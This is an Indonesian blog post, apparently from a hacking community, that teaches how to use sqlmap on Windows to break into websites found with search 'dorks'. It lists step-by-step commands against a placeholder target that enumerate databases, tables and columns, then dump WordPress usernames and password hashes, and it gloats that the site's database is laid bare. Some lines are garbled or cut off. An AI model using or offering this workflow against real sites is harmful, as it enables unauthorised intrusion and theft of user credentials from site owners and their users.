mungkin sobat
kali ini sinchankeke mau share CARA PAKAI SQLMAP DI WINDOWS MELALUI CMD atau bahasa inggris nya Step By Step Pentest web with sqlmap
langsung ajah yukkk ke tekape
alat alat yang anda butuhkan :
1.kopi + rokok
2.dork
3.python versi 2.7
4.script SQLmap
5.internet
untuk bagian alat alat yang nomer 3 dan 4 bisa sobat dapatkan di google bukannya ane ga mau share tapi koneksi ane gak mampu buat upload semua nya mudah mudahan mbah google bisa bantu sobat buat nemuin semua yang di perlukan oke mari kita lanjutkan
pertama kita buka CMD lalu ketikan command berikut
sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id
=37 --dbs
atau bisa juga dengan command berikut
klik untuk memperbesar
sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id=37 --current-db
lalu tekan enter,,
jika site nya vuln atau vulnerable maka hasilnya akan tampak
seperti SS yang ada di bawah ini
untuk tahap selanjutnya lalu ita ketikan command di bawah pada CMD sobat ( sebelumnya sobat sudah menentukan database mana yang ingin sobat lihat )
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 --tables
maka hasilnya akan tampak seperti yang ada di SS di bawah
klik untuk memperbesar |
selanjutnya kita ketikan lagi command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users --columns
maka hasilnya akan tampak seperti ss di bawah
klik untuk memperbesar |
langkah selanjutnya kita ketikan command yg di bawah ini di CMD sobat
=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users -C user_login,user_pass --dump
maka hasilnya seperti yang di bawah ini jreng jreng telanjang dah tuh database website nya
klik untuk memperbesar |
sebagai catatan buat sobat arti dari command command yang di atas :
--dbs ( memanggil semua database yang ada dalam server )
--current-db ( hanya mengambil database yang terkait di dalam situs web tersebut )
--tables ( memanggil table yang ada di dalam database )
--columns ( memanggil kolom yang ad selamat subuh sobat dream cyber comunity jumpa lagi
0 komentar:
Posting Komentar